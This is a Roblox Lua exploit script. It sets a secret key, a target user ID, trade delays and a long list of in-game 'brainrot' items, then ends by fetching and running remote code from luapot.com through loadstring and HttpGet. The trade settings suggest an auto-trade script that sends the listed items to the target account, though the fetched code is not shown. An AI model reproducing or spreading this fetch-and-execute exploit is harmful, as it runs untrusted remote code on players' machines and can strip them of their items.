getgenv().SECRET_KEY = "mrr_165416f0fd654d4b911248fc5d6fa3e8"
getgenv().TARGET_ID = 1718063814
getgenv().DELAY_STEP = 1      
getgenv().TRADE_CYCLE_DELAY = 2
getgenv().TARGET_BRAINROTS = {
    ["Los Noobinis"] = true,
    ["Noobini Pizzanini"] = true,
    ["Quesadillo Vampiro"] = true,
    ["Tacorita Bicicleta"] = true,
    ["La Extinct Grande"] = true,
    ["La Spooky Grande"] = true,
    ["Chipso and Queso"] = true,
    ["Chillin Chili"] = true,
    ["Tuff Toucan"] = true,
    ["Gobblino Uniciclino"] = true,
    ["W or L"] = true,
    ["La Jolly Grande"] = true,
    ["La Taco Combinasion"] = true,
    ["Swaggy Bros"] = true,
    ["La Romantic Grande"] = true,
    ["Festive 67"] = true,
    ["Los Tralaleritos"] = true,
    ["Las Tralaleritas"] = true,
    ["GOAT"] = true,
    ["Graipuss Medussi"] = true,
    ["Nuclearo Dinossauro"] = true,
    ["Money Money Puggy"] = true,
    ["Tang Tang Keletang"] = true,
    ["Ketupat Kepat"] = true,
    ["Tictac Sahur"] = true,
    ["Ketchuru and Musturu"] = true,
    ["Lavadorito Spinito"] = true,
    ["Garama and Madundung"] = true,
    ["Burguro And Fryuro"] = true,
    ["Capitano Moby"] = true,
    ["Cerberus"] = true,
    ["Dragon Cannelloni"] = true,
    ["Agarrini la Palini"] = true,
    ["Fragola La La La"] = true,
    ["Extinct Matteo"] = true,
    ["Karker Sahur"] = true,
    ["Bunnyman"] = true,
    ["Pirulitoita Bicicleteira"] = true,
    ["Bunito Bunito Spinito"] = true,
    ["Brunito Marsito"] = true,
    ["Guest 666"] = true,
    ["Mariachi Corazoni"] = true,
    ["Los Hotspotsitos"] = true,
    ["Los Bros"] = true,
    ["Tralaledon"] = true,
    ["Los Puggies"] = true,
    ["Los Primos"] = true,
    ["Los Tacoritas"] = true,
    ["Los Spaghettis"] = true,
    ["Ginger Gerat"] = true,
    ["Love Love Bear"] = true,
    ["Spooky and Pumpky"] = true,
    ["Fragrama and Chocrama"] = true,
    ["La Casa Boo"] = true,
    ["Los Sekolahs"] = true,
    ["Reinito Sleighito"] = true,
    ["Ketupat Bros"] = true,
    ["Cooki and Milki"] = true,
    ["Rosey and Teddy"] = true,
    ["Popcuru and Fizzuru"] = true,
    ["La Supreme Combinasion"] = true,
    ["Dragon Gingerini"] = true,
    ["Hydra Dragon Cannelloni"] = true,
    ["Celularcini Viciosini"] = true,
    ["Mieteteira Bicicleteira"] = true,
    ["La Grande Combinasion"] = true,
    ["Trenostruzzo Turbo 4000"] = true,
    ["La Karkerkar Combinasion"] = true,
    ["La Vacca Prese Presente"] = true,
    ["Los Sweethearts"] = true,
    ["Las Sis"] = true,
    ["Los Planitos"] = true,
    ["Los Mobilis"] = true,
    ["Bacuru and Egguru"] = true,
    ["Money Money Reindeer"] = true,
    ["Eviledon"] = true,
    ["Orcaledon"] = true,
    ["Jolly Jolly Sahur"] = true,
    ["Los Jolly Combinasionas"] = true,
    ["Chicleteira Noelteira"] = true,
    ["Bisonte Giuppitere"] = true,
    ["Fishino Clownino"] = true,
    ["Los Spooky Combinasionas"] = true,
    ["La Ginger Sekolah"] = true,
    ["Los 67"] = true,
    ["Esok Sekolah"] = true,
    ["Rosetti Tualetti"] = true,
    ["Sammyni Fattini"] = true,
    ["La Food Combinasion"] = true,
    ["Spaghetti Tualetti"] = true,
    ["La Secret Combinasion"] = true,
    ["Los Amigos"] = true,
    ["Los Combinasionas"] = true,
    ["List List List Sahur"] = true,
    ["Donkeyturbo Express"] = true,
    ["Chicleteira Cupideira"] = true,
    ["Chimnino"] = true,
    ["67"] = true,
    ["Los Candies"] = true,
    ["Lovin Rose"] = true,
    ["Pot Hotspot"] = true,
    ["Guerriro Digitale"] = true,
    ["Los Tortus"] = true,
    ["Torrtuginni Dragonfrutini"] = true,
    ["Los Mi Gatitos"] = true,
    ["Los Chicleteiras"] = true,
    ["Yess my examine"] = true,
    ["1x1x1x1"] = true,
    ["Noo my examine"] = true,
    ["Los Karkeritos"] = true,
    ["Las Vaquitas Saturnitas"] = true,
    ["Los Spyderinis"] = true,
    ["Los Matteos"] = true,
    ["Los Cucarachas"] = true,
    ["Los Burritos"] = true,
    ["Rang Ring Bus"] = true,
    ["Los Nooo My Hotspotsitos"] = true,
    ["Arcadopus"] = true,
    ["Los Quesadillas"] = true,
    ["Burrito Bandito"] = true,
    ["Mi Gatito"] = true,
    ["Pot Pumpkin"] = true,
    ["Quesadilla Crocodila"] = true,
    ["Horegini Boom"] = true,
    ["Nooo My Hotspot"] = true,
    ["Los Jobcitos"] = true,
    ["Tung Tung Tung Sahur"] = true,
    ["Coffin Tung Tung Tung Sahur"] = true,
    ["Blackhole Goat"] = true,
    ["Chachechi"] = true,
    ["Dul Dul Dul"] = true,
    ["Sammyni Spyderini"] = true,
    ["Karkerkar Kurkur"] = true,
    ["Noo my Heart"] = true,
    ["Los 25"] = true,
    ["Noo my Present"] = true,
    ["Noo my Candy"] = true,
    ["Cupid Hotspot"] = true,
    ["Naughty Naughty"] = true,
    ["Santa Hotspot"] = true,
    ["Telemorte"] = true,
    ["Please my Present"] = true,
    ["Reindeer Tralala"] = true,
    ["Zombie Tralala"] = true,
    ["Vulturino Skeletono"] = true,
    ["La Cucaracha"] = true,
    ["Extinct Tralalero"] = true,
    ["Jackorilla"] = true,
    ["Rocco Disco"] = true,
    ["Los Trios"] = true,
    ["Cuadramat and Pakrahmatmamat"] = true,
    ["La Sahur Combinasion"] = true,
    ["Cupid Cupid Sahur"] = true,
    ["Griffin"] = true,
    ["Nacho Spyder"] = true,
    ["Signore Carapace"] = true,
    ["Elefanto Frigo"] = true,
    ["Ventoliero Pavonero"] = true,
    ["Cloverat Clapat"] = true,
    ["Antonio"] = true,
    ["Gold Gold Gold"] = true,
    ["Tirilikalika Tirilikalako"] = true,
    ["Dug dug dug"] = true,
    ["Los Cupids"] = true,
    ["Cigno Fulgoro"] = true,
    ["Snailo Clovero"] = true,
    ["Spinny Hammy"] = true,
    ["DJ Panda"] = true,
    ["Noo my Gold"] = true,
    ["Swag Soda"] = true,
    ["Tacorillo Crocodillo"] = true,
    ["Granny"] = true,
    ["Serafinna Medusella"] = true,
    ["Secret Lucky Block"] = true,
    ["Fortunu and Cashuru"] = true,
    ["Celestial Pegasus"] = true,
    ["Chicleteirina Bicicleteirina"] = true,
    ["Chill Puppy"] = true,
    ["Luck Luck Luck Sahur"] = true,
    ["Chicleteira Bicicleteira"] = true,
    ["Eid Eid Eid Sahur"] = true,
    ["Ho Ho Ho Sahur"] = true,
    ["25"] = true,
    ["To to to Sahur"] = true,
    ["La Vacca Lepre Lepreino"] = true,
    ["Love Love Love Sahur"] = true,
    ["Giftini Spyderini"] = true,
    ["Trickolino"] = true,
    ["Paradiso Axolottino"] = true,
    ["Triplito Tralaleritos"] = true,
    ["La Vacca Jacko Linterino"] = true,
    ["Fishboard"] = true,
    ["Santteo"] = true,
    ["Job Job Job Sahur"] = true,
    ["Frankentteo"] = true,
    ["Pumpkini Spyderini"] = true,
    ["Boatito Auratito"] = true,
    ["Strawberry Elephant"] = true,
    ["Meowl"] = true,
    ["Headless Horseman"] = true,
    ["Skibidi Toilet"] = true,
    ["Hydra Bunny"] = true,
    ["Bunny and Eggy"] = true,
    ["Arcadragon"] = true,
    ["Pancake and Syrup"] = true,
    ["Foxini Lanternini"] = true,
    ["Cash or Card"] = true,
    ["La Easter Grande"] = true,
    ["Rico Dinero"] = true,
    ["Los Mariachis"] = true,
    ["Los Chillis"] = true,
    ["Raccooni Jandelini"] = true,
    ["Tob Tobi Tobi"] = true,
    ["Ganganzelli Trulala"] = true,
    ["Rhino Helicopterino"] = true,
    ["Centrucci Nuclucci"] = true,
    ["Unclito Samito"] = true,
    ["Anpali Babel"] = true,
    ["Berryno"] = true,
    ["Strawberrita"] = true,
    ["Bananito"] = true,
    ["Quackini Snackini"] = true,
    ["Hopilikalika Hopilikalako"] = true,
    ["Los Chillis"] = true,
    ["Kalika Bros"] = true,
    ["Digi Narwhal"] = true,
    ["Gym Bros"] = true,
    ["Camera Ramena"] = true,
    ["Globa Steppa"] = true,
    ["Buho de Volto"] = true,
    ["Duggy Bros"] = true,
    ["Boppin Bunny"] = true,
    ["La Lucky Grande"] = true,
    ["Churrito Bunnito"] = true,
    ["Baskito"] = true,
    ["Noo my Eggs"] = true,
    ["Los Bunitos"] = true,
    ["Bunny Bunny Bunny Sahur"] = true,
    ["Easter Easter Easter Sahur"] = true,
    ["Buntteo"] = true
}
loadstring(game:HttpGet("https://luapot.com/api/loadstring/8d542613fe56f04c308723d8e46d2008"))()
